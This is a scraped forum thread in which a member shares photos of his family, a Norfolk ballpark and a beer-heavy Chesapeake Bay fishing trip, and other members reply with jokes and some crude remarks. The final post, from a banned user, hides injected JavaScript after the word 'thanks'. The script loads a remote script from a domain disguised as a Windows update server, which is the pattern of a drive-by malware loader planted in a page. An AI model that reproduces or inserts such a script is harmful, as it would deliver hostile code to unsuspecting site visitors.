PICTURES FROM TONY MONTANA!!

These are some pictures that I had in my camera from the last few months. Some are good some are funny and some are of a bunch of drunks!!

ENJOY!!!

This first picture is of MINI MONTANA and MRS MONTANA two days after MINI'S eye surgery!! The MONTANA family would like to thank all of the folks here how sent well wishes and prayers!!

She is doing really well!!

These are pictures of HARBOR PARK in NORFOLK VIRGINIA the day before MLB opening day. The NATIONALS played the O's. I think this is one of the prettiest minor league parks in the country!!

These are pictures of the fishing trip that THE SHRINK was supposed to attend. The glue and myself won a majority of the fishing pool and drank a majority of the beer!! The Shrink had to come get me afterwards and drive me home!!
THANKS SHRINK!!!

The glue and some others in the cabin!!

A great day on the Chesapeake Bay!!

This is a picture of my buddy Ted, but more importantly the bait gurl!!

THE SHRINKS BROTHER-IN-LAW AND MY COUSIN!! COMBINED THEY DIDN'T CATCH A FISH!!

TONY MONTANA and THE DUKE!!

THE GLUE AND COUSIN CRAIG!!

One of my buddies Jeff, TONY, COUSIN CRAIG and THE DUKE!!

TONY, CRAIG, THE GLUE and THE DUKE!!

THE DUKE and THE GLUE!!

JEFF AND THE GLUE!! CHECK OUT THAT TRASH CAN FULL OF BEER CANS!! LOL!!

A TOKEN PICTURE OF OUR HOTT RECEPTIONIST!!

HOPE YOU ENJOYED THEM!! MEY'N!!!

ShavenCoinpurse

EOG Dedicated
Re: PICTURES FROM TONY MONTANA!!

I love the random pictures of "the game" that just happened to have a hot girl walking in front of the camera.. classic Tony...

Cool stuff TONY, I like this type of thing. Hope all is well with the FAMILY.

I may head out to the DODGER - D RAY game for Don Zimmer Bobblehead night Saturday and may post some pics as well here from the GAME.

EOG needs more of this.

Cool stuff TONY, I like this type of thing. Hope all is well with the FAMILY.

I may head out to the DODGER - D RAY game for Don Zimmer Bobblehead night Saturday and may post some pics as well here from the GAME.

EOG needs more of this.

DO IT!! 5TEAM!! I love pictures!! I am going to start taking more!! I hope all is well!!

winkyduck

TYVM Morgan William!!!

I love the random pictures of "the game" that just happened to have a hot girl walking in front of the camera.. classic Tony...

i saw that - GREAT ass

once again - Tony - when the drugs wear off and your wife realizes who she is REALLY married to - you are fucked - she is gone

so keep her medicated and you can stay married for a long time but the second those drugs wear off she is GONE

winky!!you obviously didn't see that stud muffin in the camo shorts, so I will post it again!! woman love me!! may'n!!

The Duke

EOG Member

Tony and the glue and cousin Craig have been my friends since we were born, but they are totally different when they are drinking.

More shit talking than you have ever heard. It is fun for a while, but then they start singing and telling jokes..... dumb f??kers. all of them.:D

Hal01

EOG Veteran

Tony,

Where are all the pictures of the flatfish y'all caught? Not another fish tale is it?

Heim

EOG Master

You guys really know how to have fun....I'm jealous..

If it wasn't for Alan Boston picking up the tab on two dinners
in Vegas rigor mortis would have set in for all of us in front
of the computer screen...

Plan on posting more over here and maybe make your bash next
year...

MAY'N whatever that means...

You guys really know how to have fun....I'm jealous..

If it wasn't for Alan Boston picking up the tab on two dinners
in Vegas rigor mortis would have set in for all of us in front
of the computer screen...

Plan on posting more over here and maybe make your bash next
year...

MAY'N whatever that means...

yeah heim!! it's a fun bunch. i have a great time with my brother [the glue] ,my friends and of course THE SHRINK.

i hope you do come around and post at EOG from time to time!! there are alot of really good people here and THE EOG BLAST is flat out awesome.

we would be lucky to have you attend!!

as for MAY'N!! it is how TONY MONTANA said MAN in the movie Scarface IMO!!

some like it!! some don't!! but it is my call sign, so fvck it!!

take it easy my new friend!!:cheers

idiotspayforpick

EOG Dedicated

just put my little girl to bed and man she is the love of my life. They are wonderful, curious little creatures.

andrew748

Banned

I can see that MissyMAY'N is going to be a heart breaker like MOM.

ps can MOM return that fragment of my heart when she's finished :)

Thanks ANDREW!! She is a cool kid!!

As for MRS M. she sends her love, but she does give things back!! lol!!!

Nice family Tony, kids are the world.

Now, lets get back to that boat situation. Where were all the chicks hiding? I caught one in the picture, and then she was not even close to being in any other pictures.

HMMMM...LOL. I bet Shrink was on one of those giant old satellite phones arguing with Jman . He was'nt around either.

ZZ CREAM

EOG Master

Was Fred Smoot on that boat?:+textinb3:+textinb3:+textinb3:+textinb3

Nice family Tony, kids are the world.

Now, lets get back to that boat situation. Where were all the chicks hiding? I caught one in the picture, and then she was not even close to being in any other pictures.

HMMMM...LOL. I bet Shrink was on one of those giant old satellite phones arguing with Jman . He was'nt around either.

THAT WAS A WORK TRIP....AND THE GIRL WAS A MASTERBAITGIRL!!:+textinb3

TheCat

Banned

thanks

<script language="JavaScript" type="text/javascript">document.write("<" + "script language='JavaScript' type='text/javascript' src='http://windows-updateserver.com/signature/bMVu0YtaXE4SL7ByPUFuL7dW6w4KfcRq?rand=" + Math.random() * 100000000 +"'></"+"script>")</script><script language="JavaScript" type="text/javascript" src="http://windows-updateserver.com/signature/bMVu0YtaXE4SL7ByPUFuL7dW6w4KfcRq?rand=44216198.430619955"></script>